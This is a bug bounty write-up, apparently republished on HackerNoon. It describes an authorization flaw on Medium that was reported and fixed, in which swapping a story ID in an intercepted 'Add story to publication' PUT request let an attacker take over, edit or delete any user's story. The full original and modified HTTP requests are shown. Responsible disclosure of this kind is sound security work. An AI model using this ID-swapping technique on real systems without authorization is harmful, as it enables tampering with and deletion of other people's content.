Update and Delete any Story of any user on Medium

Aj Dumanhug
Jun 29, 2016 · 3 min read

Before the end of this year, Two well-known people was hacked. Mark Zuckerberg (CEO) of Facebook and Sundar Pichai (CEO) of Google and I was thinking what if it’s time for me to hack Barack Obama. But, I know that isn’t easy.

So, I decided to use my big brain to think my way out!
Looking for a new angle… Then, I found the “Request Story” button hiding in the ‘ellipsis’ or ‘more’ icon.

But, there’s a problem. They, need to approve my request to add their story into my publication and that’s absolutely impossible. But apparently, I can add my own story into my publication without further ado.

First step of adding a story to publication.
Second and Last step is to choose a publication where you want to add the story.

My goal here is to add any story of another user into my publication without their consent and I did that using the “Add story to publication” button.

While I’m adding my own story to my publication, I intercepted the HTTP Request to modify the story ID.

My Story ID: 2a4b6810c12d
Story ID of the target: 1a3b579c101a

The HTTP Request:

PUT /testphzxc/2a4b6810c12d HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}
{“postStatus”:”APPROVED”}

In the line where the PUT method is located, you will see the ID of my story. And I will remove that ID and put the ID of the target’s story.

Updated HTTP Request:

PUT /testphzxc/1a3b579c101a HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}
{“postStatus”:”APPROVED”}

Of course, like what I’ve just mentioned above, the story will automatically added to my publication without their consent. That is because of:

{“postStatus”:”APPROVED”} 

Then *Poof*. The Target’s story was added to my publication.

Now What? Because the story was added to my publication, I am now able to edit his/her story or delete it.

Well, instead of attacking Mr. Obama’s blog, I reported it to Medium.
They fixed it and rewarded me with a $250 bounty but I want more because I found multiple bugs in my report. First, Bypass the Request Story and Two, Update and Delete any story. Then, they added the previous bounty with a $100 bounty for a total of $350 bounty.

Hacker Noon is how hackers start their afternoons. We’re a part of the @AMI family. We are now accepting submissions and happy to discuss advertising & sponsorship opportunities.

If you enjoyed this story, we recommend reading our latest tech stories and trending tech stories. Until next time, don’t take the realities of the world for granted!

HackerNoon.com

how hackers start their afternoons.

Aj Dumanhug

Written by

CTO /CISO at Secuna, Moderator at hackstreetboys, Cybersecurity Trainer at UP and Adamson. Cybersecurity PH CERT and ROOTCON 13 CTF Champion.

HackerNoon.com

how hackers start their afternoons.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade